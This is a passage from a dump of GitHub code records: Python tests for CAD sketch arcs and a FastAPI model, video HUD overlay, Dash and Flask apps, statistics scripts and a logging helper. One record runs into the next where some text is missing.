math.fabs(aRadius1 - aRadius2)\n assert math.fabs(aRSum - aDistCC) < TOLERANCE or math.fabs(aRDiff - aDistCC) < TOLERANCE, \"Arcs do not tangent\"\n\ndef verifyArcLineTangent(theArc, theLine):\n aCenter = geomDataAPI_Point2D(theArc.attribute(\"center_point\"))\n aStart = geomDataAPI_Point2D(theArc.attribute(\"start_point\"))\n aRadius = model.distancePointPoint(aStart, aCenter)\n\n aDistCL = model.distancePointLine(aCenter, theLine)\n assert math.fabs(aDistCL - aRadius) < TOLERANCE, \"Arc and line do not tangent\"\n\ndef verifyPointOnLine(thePoint, theLine):\n aDistance = model.distancePointLine(thePoint, theLine)\n assert aDistance < TOLERANCE, \"Point is not on Line, distance: {0}\".format(aDistance)\n\n\n\naSession = ModelAPI_Session.get()\naDocument = aSession.moduleDocument()\n#=========================================================================\n# Creation of a sketch\n#=========================================================================\naSession.startOperation()\naSketchCommonFeature = aDocument.addFeature(\"Sketch\")\naSketchFeature = featureToCompositeFeature(aSketchCommonFeature)\norigin = geomDataAPI_Point(aSketchFeature.attribute(\"Origin\"))\norigin.setValue(0, 0, 0)\ndirx = geomDataAPI_Dir(aSketchFeature.attribute(\"DirX\"))\ndirx.setValue(1, 0, 0)\nnorm = geomDataAPI_Dir(aSketchFeature.attribute(\"Norm\"))\nnorm.setValue(0, 0, 1)\naSession.finishOperation()\naSketch = SketchAPI_Sketch(aSketchFeature)\n\n# auxiliary line\naLineStartPnt = [0., 0.]\naLineEndPnt = [50., 0.]\naSession.startOperation()\naSketchLine = aSketchFeature.addFeature(\"SketchLine\")\naLineStart = geomDataAPI_Point2D(aSketchLine.attribute(\"StartPoint\"))\naLineEnd = geomDataAPI_Point2D(aSketchLine.attribute(\"EndPoint\"))\naLineStart.setValue(aLineStartPnt[0], aLineStartPnt[1])\naLineEnd.setValue(aLineEndPnt[0], aLineEndPnt[1])\naSession.finishOperation()\n\n#=========================================================================\n# Test 1. Create an arc, tangent to the line\n#=========================================================================\nanArcEndPnt = [80., 20.]\naSession.startOperation()\nanArc = aSketchFeature.addFeature(\"SketchMacroArc\")\nassert (anArc.getKind() == \"SketchMacroArc\")\nanArcTgPnt = anArc.refattr(\"tangent_point\")\nassert (not anArcTgPnt.isInitialized())\nanArcEnd = geomDataAPI_Point2D(anArc.attribute(\"end_point_3\"))\nassert (not anArcEnd.isInitialized())\nanArcType = anArc.string(\"arc_type\")\nassert (not anArcType.isInitialized())\n# initialize attributes\nanArcType.setValue(\"by_tangent_edge\")\nanArcTgPnt.setAttr(aLineEnd)\nanArcEnd.setValue(anArcEndPnt[0], anArcEndPnt[1])\naSession.finishOperation()\nverifyLastArc(aSketchFeature, [], aLineEndPnt, anArcEndPnt)\naLastArc = model.lastSubFeature(aSketchFeature, \"SketchArc\")\nverifyTangent(aLastArc, aSketchLine)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintCoincidence\", 1)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintTangent\", 1)\n\n#=========================================================================\n# Test 2. Create an arc, tangent to the previous arc\n#=========================================================================\naPrevArc = aLastArc\naPrevArcEnd = geomDataAPI_Point2D(aPrevArc.attribute(\"end_point\"))\nanArcEndPnt = [50., 100.]\naSession.startOperation()\nanArc = aSketchFeature.addFeature(\"SketchMacroArc\")\nanArcTgPnt = anArc.refattr(\"tangent_point\")\nanArcEnd = geomDataAPI_Point2D(anArc.attribute(\"end_point_3\"))\nanArcType = anArc.string(\"arc_type\")\n# initialize attributes\nanArcType.setValue(\"by_tangent_edge\")\nanArcTgPnt.setAttr(aPrevArcEnd)\nanArcEnd.setValue(anArcEndPnt[0], anArcEndPnt[1])\naSession.finishOperation()\nverifyLastArc(aSketchFeature, [], [aPrevArcEnd.x(), aPrevArcEnd.y()], anArcEndPnt)\naLastArc = model.lastSubFeature(aSketchFeature, \"SketchArc\")\nverifyTangent(aLastArc, aPrevArc)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintCoincidence\", 2)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintTangent\", 2)\n\n#=========================================================================\n# Test 3. Create an arc, tangent to the previous arc with end point on the line\n#=========================================================================\naPrevArc = aLastArc\naPrevArcEnd = geomDataAPI_Point2D(aPrevArc.attribute(\"end_point\"))\naSession.startOperation()\nanArc = aSketchFeature.addFeature(\"SketchMacroArc\")\nanArcTgPnt = anArc.refattr(\"tangent_point\")\nanArcEnd = geomDataAPI_Point2D(anArc.attribute(\"end_point_3\"))\nanArcEndRef = anArc.refattr(\"end_point_ref\")\nanArcType = anArc.string(\"arc_type\")\n# initialize attributes\nanArcType.setValue(\"by_tangent_edge\")\nanArcTgPnt.setAttr(aPrevArcEnd)\nanArcEndRef.setObject(aSketchLine.lastResult())\nanArcEnd.setValue(aLineStartPnt[0], aLineStartPnt[1])\naSession.finishOperation()\nverifyLastArc(aSketchFeature, [], [aPrevArcEnd.x(), aPrevArcEnd.y()], [])\naLastArc = model.lastSubFeature(aSketchFeature, \"SketchArc\")\nverifyTangent(aLastArc, aPrevArc)\naLastArcEnd = geomDataAPI_Point2D(aLastArc.attribute(\"end_point\"))\nverifyPointOnLine(aLastArcEnd, aSketchLine)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintCoincidence\", 4)\nmodel.testNbSubFeatures(aSketch, \"SketchConstraintTangent\", 3)\n\n#=========================================================================\n# End of test\n#=========================================================================\n\nassert(model.checkPythonDump())\n","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/SketchPlugin/Test/TestCreateArcByTangentEdge.py","file_name":"TestCreateArcByTangentEdge.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39458397670","text":"#\n#\n# @param num int整型一维数组\n# @param target int整型\n# @return int整型二维数组\n#\nclass Solution:\n def combinationSum2(self , num , target ):\n # write code here\n def dfs(path,target,start):\n if target<0:\n return\n if target == 0:\n res.append(path[:])\n return\n for i in range(start,n):\n if (i>start and num[i] == num[i-1]) or target50K'\n \"\"\"\n # raw data as read from file\n raw_data = offline_inference_artifacts['offline_dataframe']\n parsed_data = raw_data.to_dict(orient='records')\n offline_predictions = offline_inference_artifacts['offline_predictions']\n for raw_json_input, expected_prediction in zip(parsed_data,\n offline_predictions):\n if expected_prediction == '>50K':\n r = client.post('/inference', json=raw_json_input)\n assert r.status_code == 200\n assert r.json() == Output(salary=expected_prediction).dict()\n","repo_name":"marcospiau/ml-devops-nanodegree-project-course-4","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35453068518","text":"from __future__ import unicode_literals\n\nfrom mpi4py import MPI\n\nfrom .adaptive_calibration import calibration_scale_factor_adaptive\nfrom .dip import dip_scale_factor\nfrom .bandwidth import h_crit_scale_factor\n\n\ndef compute_calibration(calibration_file, test, null, alpha, adaptive=True,\n lower_lambda=0, upper_lambda=2.0, comm=MPI.COMM_WORLD):\n '''\n Compute calibration constant lambda_alpha and save to file\n 'calibration_file'.\n\n Input:\n test - 'dip' or 'bw'.\n null - 'shoulder' or 'normal'. Reference\n distribution.\n alpha - significance level.\n adaptive - should adaptive probabilistic bisection\n search be used?\n lower_lambda - lower bound for lambda_alpha in\n bisection search.\n upper_lambda - upper bound for lambda_alpha in\n bisection search.\n comm - MPI communicator.\n '''\n\n if comm.Get_rank() == 0:\n try:\n with open(calibration_file, 'a') as f:\n pass # check that it is possible to write to file\n except Exception as e:\n exc = e\n else:\n exc = None\n else:\n exc = None\n exc = comm.bcast(exc)\n if not exc is None:\n raise exc\n\n if adaptive:\n return calibration_scale_factor_adaptive(alpha, test, null, lower_lambda, upper_lambda,\n comm, calibration_file)\n\n if test == 'dip':\n return dip_scale_factor(alpha, null, lower_lambda, upper_lambda,\n comm, calibration_file)\n\n if test == 'bw':\n return h_crit_scale_factor(alpha, null, lower_lambda, upper_lambda,\n comm, calibration_file)","repo_name":"kjohnsson/modality","sub_path":"modality/calibration/compute_calibration.py","file_name":"compute_calibration.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"36388349150","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\n HUD OVERLAY DRAWER\r\nThe script draws telemetry HUD overlay on FPV video. Telemetry data should\r\nbe provided as Strava-derived *.gpx track and offset file formed via\r\nmoment_track.py script.\r\n\r\nLook for Settings section to adjust parameters.\r\n\r\nNote that the script is intended to be ran from an IDE (like Spyder or\r\nsomething like this). It can be called via command line of course, but \r\nit doesn't accept any command line parameters. So you really SHOULD look\r\nfor the Settings section.\r\n\r\n\r\nDISCLAMER:\r\nThe script is really doing what it declared to do, although it's far from\r\noptimized. It's ridiculously slow to be honest. Mostly serves me as a testing\r\nground for related technologies. Still it does the thing if you're not\r\nexpecting fast video processing from a python script.\r\n\r\nPrerequisites: pillow, py-opencv, numpy, pandas\r\n'''\r\n\r\nimport strava_gpx as strava\r\nimport pandas as pd\r\nimport numpy as np\r\nimport cv2\r\nimport PIL\r\nimport os\r\nimport json\r\nfrom widgets import Speedometer, Map, HeartRate\r\n\r\n##########################################################################\r\ndef decodeFourcc(cc):\r\n return ''.join([chr((int(cc) >> 8 * i) & 0xff) for i in range(4)]).upper()\r\n##########################################################################\r\ndef pure_pil_alpha_to_color(image, color=(255, 255, 255)):\r\n '''Alpha composite an RGBA Image with a specified color.\r\n Source: http://stackoverflow.com/a/9459208/284318\r\n Keyword Arguments:\r\n image -- PIL RGBA Image object\r\n color -- Tuple r, g, b (default 255, 255, 255)\r\n '''\r\n image.load() # needed for split()\r\n background = PIL.Image.new('RGB', image.size, color)\r\n background.paste(image, mask=image.split()[3]) # 3 is the alpha channel\r\n return background\r\n##########################################################################\r\ndef readOffsets(finename):\r\n try:\r\n with open(finename, 'r') as f:\r\n fileData = json.load(f)\r\n dt = pd.to_timedelta(fileData['diffTime'])\r\n dtMs = int(fileData['diffMS'])\r\n except:\r\n dt = pd.to_timedelta('0 days 00:00:00')\r\n dtMs = 0\r\n \r\n return dt, dtMs\r\n##########################################################################\r\ndef timeSec(hours, minutes, seconds):\r\n return int(seconds + 60*minutes + 3600*hours)\r\n##########################################################################\r\nif __name__ == '__main__':\r\n # ------- Settings -------\r\n # Input video file name. No strict requirements as long as OpenCV can read it\r\n videoFileName = 'e:/ph/Sochi-2019/video/2019_0923_123806_025.MOV'\r\n\r\n # Input video start time. Usually comes from file naming of attributes\r\n videoStartTime = np.datetime64('2019-09-23 12:38:06')\r\n\r\n # Input video start and stop moments (in seconds from start) \r\n timingStart = timeSec(hours=0, minutes=13, seconds=11)\r\n timingEnd = timeSec(hours=0, minutes=14, seconds=35)\r\n \r\n # Input track file name. Should be track saved from Strava via \"Export GPX\"\r\n # function (assuming it works the same way as at November 2019)\r\n trackFileName = 'downhill.gpx'\r\n \r\n # Input timing offsets file. The one saved with moment_track.py\r\n offsetFileName = 'offset.json'\r\n\r\n # Output video vile parameters. Compatibility depends on local OpenCV version\r\n outFile = 'out.mp4'\r\n encoding = 'h264'\r\n \r\n # Forced output size. Not used if at least one is negative or None\r\n forcedWidth = None\r\n forcedHeight = None\r\n\r\n # Widgets\r\n # Check different IMPLs for a variety of presets\r\n widgets = [\r\n Speedometer.IMPL01(pos=(100, 600), scale=1.0),\r\n Map.IMPL02(pos=(1100, 50), size=(800, 800)),\r\n HeartRate.IMPL01(pos=(1600, 900), scale=1.0)\r\n ]\r\n # ------- End of settings -------\r\n \r\n # Clear output file if exists\r\n if os.path.exists(outFile):\r\n os.remove(outFile) # Will rise exception if it's a directory\r\n\r\n # Read offsets\r\n diffTime, diffTimeMS = readOffsets(offsetFileName)\r\n\r\n # Read GPX\r\n df = strava.readGPX(trackFileName, interpolateToSeconds=False)\r\n \r\n # Prepare widgets\r\n for w in widgets:\r\n w.prepare(df)\r\n \r\n # Open video\r\n cap = cv2.VideoCapture(videoFileName)\r\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n expectedFrames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n outFPS = cap.get(cv2.CAP_PROP_FPS)\r\n \r\n print('File: ', videoFileName)\r\n print(\r\n decodeFourcc(cap.get(cv2.CAP_PROP_FOURCC)), '@', '%.0f FPS'%cap.get(cv2.CAP_PROP_FPS),\r\n ':', width, 'x', height\r\n )\r\n print('Frames: ', expectedFrames)\r\n \r\n # Check resizing and form the output writer \r\n isResizing = (not forcedWidth is None and forcedWidth > 0) and (not forcedHeight is None and forcedHeight > 0)\r\n if isResizing:\r\n width = int(forcedWidth)&~1\r\n height = int(forcedHeight)&~1\r\n \r\n fourcc = cv2.VideoWriter_fourcc(*encoding)\r\n out = cv2.VideoWriter(outFile, fourcc, outFPS, (width, height))\r\n \r\n timingPrev = 0\r\n\r\n videoTime = pd.to_datetime(videoStartTime) - diffTime\r\n \r\n # Percentage scaling\r\n timingScale = 100.0/(timingEnd - timingStart)\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n \r\n timingCurMS = cap.get(cv2.CAP_PROP_POS_MSEC) - diffTimeMS\r\n timingCur = int(timingCurMS/1000)\r\n \r\n if not timingPrev == timingCur:\r\n percentStr = 'skipping to start...'\r\n if timingCur >= timingStart:\r\n percentage = int((timingCur - timingStart)*timingScale)\r\n percentStr = '%d%% complete'%(percentage)\r\n else:\r\n percentage = int((timingCur/timingStart)*100) if timingStart > 0 else 100\r\n percentStr = 'skipping to start... %d%%'%(percentage)\r\n print('Cur timing: %d of %d to %d (%s)'% (timingCur, timingStart , timingEnd, percentStr))\r\n timingPrev = timingCur\r\n \r\n if timingCur < timingStart:\r\n continue\r\n elif timingCur >= timingEnd:\r\n break\r\n \r\n curRec = strava.getRecordForTimeAndOffset(df, videoTime, timingCurMS)\r\n \r\n # ocv to pil\r\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\r\n pil_im = PIL.Image.fromarray(frame).convert('RGBA')\r\n \r\n # Draw widgets\r\n for w in widgets:\r\n w.draw(pil_im, curRec)\r\n \r\n # pil to ocv\r\n if isResizing:\r\n frame = cv2.resize(np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1], (width, height), interpolation=cv2.INTER_AREA)\r\n else:\r\n frame = np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1]\r\n #frame = np.array(pure_pil_alpha_to_color(pil_im))[:, :, ::-1].copy()\r\n\r\n # Write frame \r\n out.write(frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n \r\n cap.release()\r\n out.release()\r\n cv2.destroyAllWindows()\r\n \r\n print('Done.')\r\n","repo_name":"youzhick/StravaOverlay","sub_path":"overlay_drawer.py","file_name":"overlay_drawer.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"20098005141","text":"from project import search\r\nimport sqlite3\r\nfrom flask import Flask, request, render_template\r\napp = Flask(__name__)\r\n\r\ncon = sqlite3.connect('тексты (3).bd')\r\ncur = con.cursor()\r\n\r\n\r\n@app.route('/')\r\ndef my_form():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/search', methods=['post'])\r\ndef my_form_post():\r\n variable = request.form['variable']\r\n search_exp = str(variable)\r\n result = search(search_exp)\r\n return render_template('search.html', result=result)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"AlexandraSedlovskaya/project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1407852777","text":"from stat_alunos import *\nimport random\nimport copy\nimport operator\nimport math\n\n# H0 - there's no differences between the runs. alpha = 0.05, se p value < alpha -> rejeitar nula e aceitar a H2\n\n# fazer experiencias para as distribuiçoes. definir alpha -> se p value for inferior -> pode se rejeitar hipotese nula (é diferente)\ndef analysis():\n\n print(\"Escolha a funçao\")\n print('[1] Rastrigin')\n print('[2] Schwefel')\n print('[3] Griewangk')\n key = int(input())\n\n if key==1:\n function = \"Rastrigin\"\n elif key == 2:\n function = \"Schwefel\"\n elif key == 3:\n function = \"Griewangk\"\n\n print(\"Escolha o que quer analisar\")\n print(\"[1] Fitness\")\n print(\"[2] Geraçao com melhor fitness\")\n tipo = int(input())\n\n\n significance_alpha = 0.05\n one_cross = [[float(x.split(' ')[tipo-1].rstrip()) for x in open(function + \"_one.txt\").readlines()]]\n ari_cross = [[float(x.split(' ')[tipo-1].rstrip()) for x in open(function + \"_arit.txt\").readlines()]]\n all_rastrigin_data = [one_cross[0], ari_cross[0]]\n \n\n #DATA DESCRIPTION\n \"\"\" print('\\n')\n describe_data(one_cross[0])\n print('\\n')\n describe_data(ari_cross[0])\n print('\\n') \"\"\"\n #################\n data = [one_cross[0], ari_cross[0]]\n plt.subplot(221)\n histogram_norm(data[0], \"Histogram\", \"value\", \"quantity\")\n\n plt.subplot(222)\n histogram_norm(data[1], \"Histogram\", \"value\", \"quantity\")\n\n plt.subplot(223)\n plt.boxplot(data[0], labels=[function + \" One Point\"])\n\n plt.subplot(224)\n plt.boxplot(data[1], labels=[function + \" Arithmetical\"])\n\n plt.show()\n \n test_statistic_one, p_value_one_point = test_normal_sw(one_cross)\n test_statistic_ari, p_value_ari = test_normal_sw(ari_cross)\n test_statistic_levene, p_value_levene = levene(all_rastrigin_data)\n print(\"shapiro p_value one: \", p_value_one_point)\n print(\"shapiro p_value ari: \", p_value_ari)\n print(\"levene p_value: \", p_value_levene)\n if(p_value_one_point >= significance_alpha and p_value_ari >= significance_alpha and p_value_levene >= significance_alpha):\n #Parametric\n print(\"Parametric\")\n #final_ts, final_pv = one_way_ind_anova(file_data)\n #t_test_ind(one_cross, ari_cross)\n final_ts, final_pv = t_test_dep(one_cross[0], ari_cross[0])\n else:\n #Non-parametric\n print(\"Non-parametric\")\n #final_ts, final_pv = kruskal_wallis(file_data)\n #final_ts, final_pv = mann_whitney(one_cross[0], ari_cross[0])\n #final_ts, final_pv = t_test_ind(one_cross, ari_cross)\n final_ts, final_pv = wilcoxon(one_cross[0], ari_cross[0])\n \n print(final_ts, final_pv)\n \n if(final_pv < significance_alpha):\n print('Null hypothesis (H0) rejected. Accept H1 -> Different')\n elif (final_pv >= significance_alpha):\n print('H0 accepted. Theres probably no difference!')\n\n\nif __name__ == '__main__':\n analysis()","repo_name":"flaviojfpereira/ea-crossover-operators-comparison","sub_path":"proj_stat_analysis.py","file_name":"proj_stat_analysis.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37035514822","text":"import logging\nfrom logging import FileHandler\n\nfrom os import path, makedirs\n\n_log_formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-.4s (%(filename)s).%(funcName)s(%(lineno)s) %('\n 'message)s',\n datefmt='%d.%m.%Y %H:%M:%S')\n\n\ndef get_file_handler():\n if not path.exists('logs'):\n makedirs('logs')\n\n file_handler = FileHandler('logs/Log.log')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(_log_formatter)\n return file_handler\n\n\ndef get_stream_handler():\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n stream_handler.setFormatter(_log_formatter)\n return stream_handler\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n logger.addHandler(get_file_handler())\n logger.addHandler(get_stream_handler())\n return logger\n","repo_name":"Navatusein/Ip-Deputy-2.0","sub_path":"Bot/tgbot/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39142454627","text":"from services.mongo_access import MongoDBCollections\nfrom venders.mopsfin import Mopsfin\n\n\nclass IncomeProcessor:\n def __init__(self):\n self.mongo = MongoDBCollections()\n self.data = Mopsfin().get_income()\n\n def process(self):\n for index, item in self.data.iterrows():\n item_dict = item.to_dict()\n symbol = item_dict.pop(\"symbol\")\n date_key = item_dict.pop(\"date_key\")\n print(f\"processing {symbol} {date_key}\")\n self.mongo.insert_income(symbol=symbol, date_key=date_key, data=item_dict)\n","repo_name":"davidleeasset/stock_bot_007","sub_path":"services/income_processer.py","file_name":"income_processer.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28458977061","text":"import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\n\r\nfrom plotly.offline import plot, iplot\r\nimport plotly.graph_objs as go\r\nimport numpy as np\r\nimport pandas as pd\r\nimport quandl\r\nimport plotly.figure_factory as ff\r\nimport matplotlib as mpl\r\nimport plotly.plotly as py\r\n\r\nfrom pplots import *\r\nfrom pcode import *\r\n\r\napp=dash.Dash()\r\n\r\napp.css.append_css({\"external_url\": 'https://codepen.io/chriddyp/pen/bWLwgP.css'})\r\napp.title=\"ApPlotly\"\r\n\r\napp.layout=html.Div([\r\n\r\n\r\n\thtml.Div([html.H1(children=\"ApPlotly\", style={\"color\":\"maroon\", \"text-align\":\"center\", \"font-family\":\"cursive\",\r\n\t\t\"font-weight\":\"bold\", \"font-size\":\"60px\",})],\r\n\t\tclassName=\"twelve columns\"),\r\n\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div([dcc.Dropdown(\r\n\t\t\t\tid = 'dropdown',\r\n\t\t\t\toptions=[\r\n\t {'label': 'Simple scatter plot', 'value': 1},\r\n\t {'label': 'Styled scatter plot', 'value': 2},\r\n\t {'label': 'Multiple scatter plot', 'value': 3},\r\n\t {'label': 'Simple line chart', 'value': 4},\r\n\t {'label': 'Line with Scatter', 'value': 5},\r\n\t {'label': 'Dashed/dotted lines', 'value': 6},\r\n\t {'label': 'Simple pie chart', 'value': 7},\r\n\t {'label': 'Styled pie chart', 'value': 8},\r\n\t {'label': 'Donuts type pie chart', 'value': 9},\r\n\t {'label': 'Simple bar chart', 'value': 10},\r\n\t {'label': 'Grouped/stacked bar chart', 'value': 11},\r\n\t {'label': 'Simple vertical histogram', 'value': 12},\r\n\t {'label': 'Simple horizontal histogram', 'value': 13},\r\n\t {'label': 'Overlaid histograms', 'value': 14},\r\n\t {'label': 'Simple vertical box plot', 'value': 15},\r\n\t {'label': 'Simple horizontal box plot', 'value': 16},\r\n\t {'label': 'Simple table', 'value': 17},\r\n\t {'label': 'Styled table', 'value': 18},\r\n\t {'label': 'Pandas Scatter plot', 'value': 19},\r\n\t {'label': 'Pandas Histogram (absolute values)', 'value': 20},\r\n\t {'label': 'Pandas Histogram (percentage changes)', 'value': 21},\r\n\t {'label': 'Pandas Box plot', 'value': 22},\r\n\t {'label': 'Pandas Corr plot', 'value': 23}\r\n\r\n\t ], placeholder='Please, select a plot'),\r\n\t\t\t\r\n\t\t\thtml.Button(id='submit', n_clicks=0, children='Submit'),\r\n\t\t\t], className=\"four columns\")]),\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div([\r\n\t\t\tdcc.Graph(id=\"plot1\")],\r\n\t\t\tclassName=\"six columns\"),\r\n\r\n\t\t\thtml.Div([\r\n\t\t\tdcc.SyntaxHighlighter(id=\"syntax1\")],\r\n\t\t\tclassName=\"six columns\"),\r\n\r\n\t\t\t], className=\"twelve columns\"),\r\n\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"red\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'red_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t], className=\"twelve columns\"),\r\n\t\t\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"blue\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'blue_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t], className=\"twelve columns\"),\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"green\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'green_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t\r\n\t\t\t], className=\"twelve columns\")\r\n])\r\n\r\n \r\n\r\n\r\n#dropdown plot\r\n\r\n@app.callback(\r\n Output(component_id='plot1', component_property='figure'),\r\n [Input(component_id='submit', component_property='n_clicks')],\r\n [State(component_id='dropdown', component_property='value'),\r\n State(component_id='red_range', component_property='value'),\r\n\tState(component_id='green_range', component_property='value'),\r\n\tState(component_id='blue_range', component_property='value')])\r\n\t\r\n\r\ndef update_graph(clicks, input_value1, red, green, blue):\r\n\tprint(input_value1)\r\n\tcolor=\"rgba(\"+str(red)+\",\"+str(green)+\",\"+str(blue)+\",0.5)\"\r\n\tif input_value1==1:\r\n\t\treturn make_sp1(color)\r\n\tif input_value1==2:\r\n\t\treturn make_sp2(color)\r\n\tif input_value1==3:\r\n\t\treturn make_sp3(color)\r\n\tif input_value1==4:\r\n\t\treturn make_sl1(color)\r\n\tif input_value1==5:\r\n\t\treturn make_sl2(color)\r\n\tif input_value1==6:\r\n\t\treturn make_sl3(color)\r\n\tif input_value1==7:\r\n\t\treturn make_pie1(color)\r\n\tif input_value1==8:\r\n\t\treturn make_pie2(color)\r\n\tif input_value1==9:\r\n\t\treturn make_pie3(color)\r\n\tif input_value1==10:\r\n\t\treturn make_bar1(color)\r\n\tif input_value1==11:\r\n\t\treturn make_bar2(color)\r\n\tif input_value1==12:\r\n\t\treturn make_hist1(color)\r\n\tif input_value1==13:\r\n\t\treturn make_hist2(color)\r\n\tif input_value1==14:\r\n\t\treturn make_hist3(color)\r\n\tif input_value1==15:\r\n\t\treturn make_box1(color)\r\n\tif input_value1==16:\r\n\t\treturn make_box2(color)\r\n\tif input_value1==17:\r\n\t\treturn make_t1(color)\r\n\tif input_value1==18:\r\n\t\treturn make_t2(color)\r\n\tif input_value1==19:\r\n\t\treturn make_ps1(color)\r\n\tif input_value1==20:\r\n\t\treturn make_ph1(color)\r\n\tif input_value1==21:\r\n\t\treturn make_ph2(color)\r\n\tif input_value1==22:\r\n\t\treturn make_pb1(color)\r\n\tif input_value1==23:\r\n\t\treturn make_pc1(color)\r\n\t\r\n\r\n\treturn make_sp1(color)\r\n\r\n#dropdown syntax\r\n\r\n@app.callback(\r\n Output(component_id='syntax1', component_property='children'),\r\n [Input(component_id='submit', component_property=\"n_clicks\")],\r\n [State(component_id='dropdown', component_property='value'),\r\n State(component_id='red_range', component_property='value'),\r\n\tState(component_id='green_range', component_property='value'),\r\n\tState(component_id='blue_range', component_property='value')])\r\n\t\r\n\r\ndef update_graph(clicks, input_value2, red, green, blue):\r\n\r\n\tcolor=\"rgba(\"+str(red)+\",\"+str(green)+\",\"+str(blue)+\",0.5)\"\r\n\t\r\n\tif input_value2==1:\r\n\t\treturn code_sp1(color)\r\n\tif input_value2==2:\r\n\t\treturn code_sp2(color)\r\n\tif input_value2==3:\r\n\t\treturn code_sp3(color)\r\n\tif input_value2==4:\r\n\t\treturn code_sl1(color)\r\n\tif input_value2==5:\r\n\t\treturn code_sl2(color)\r\n\tif input_value2==6:\r\n\t\treturn code_sl3(color)\r\n\tif input_value2==7:\r\n\t\treturn code_pie1(color)\r\n\tif input_value2==8:\r\n\t\treturn code_pie2(color)\r\n\tif input_value2==9:\r\n\t\treturn code_pie3(color)\r\n\tif input_value2==10:\r\n\t\treturn code_bar1(color)\r\n\tif input_value2==11:\r\n\t\treturn code_bar2(color)\r\n\tif input_value2==12:\r\n\t\treturn code_hist1(color)\r\n\tif input_value2==13:\r\n\t\treturn code_hist2(color)\r\n\tif input_value2==14:\r\n\t\treturn code_hist3(color)\r\n\tif input_value2==15:\r\n\t\treturn code_box1(color)\r\n\tif input_value2==16:\r\n\t\treturn code_box2(color)\r\n\tif input_value2==17:\r\n\t\treturn code_t1(color)\r\n\tif input_value2==18:\r\n\t\treturn code_t2(color)\r\n\tif input_value2==19:\r\n\t\treturn code_ps1(color)\r\n\tif input_value2==20:\r\n\t\treturn code_ph1(color)\r\n\tif input_value2==21:\r\n\t\treturn code_ph2(color)\r\n\tif input_value2==22:\r\n\t\treturn code_pb1(color)\r\n\tif input_value2==23:\r\n\t\treturn code_pc1(color)\r\n\r\n\treturn code_sp1(color)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server()","repo_name":"VaroojanK/Final_Project","sub_path":"Project_dash.py","file_name":"Project_dash.py","file_ext":"py","file_size_in_byte":6712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16592639157","text":"from abc import (\n ABC,\n abstractmethod,\n)\nfrom typing import (\n Type,\n)\n\nfrom lahja import (\n BaseEvent,\n BaseRequestResponseEvent,\n)\n\nfrom p2p.kademlia import Node\nfrom p2p.p2p_proto import (\n DisconnectReason,\n)\nfrom p2p.protocol import (\n Command,\n PayloadType,\n)\n\n\nclass HasRemoteEvent(BaseEvent, ABC):\n \"\"\"\n Abstract base event for event types that carry a ``Node`` on the ``remote`` property.\n \"\"\"\n\n @property\n @abstractmethod\n def remote(self) -> Node:\n pass\n\n\nclass ConnectToNodeCommand(HasRemoteEvent):\n \"\"\"\n Event that wraps a node URI that the pool should connect to.\n \"\"\"\n\n def __init__(self, remote: Node) -> None:\n self._remote = remote\n\n @property\n def remote(self) -> Node:\n 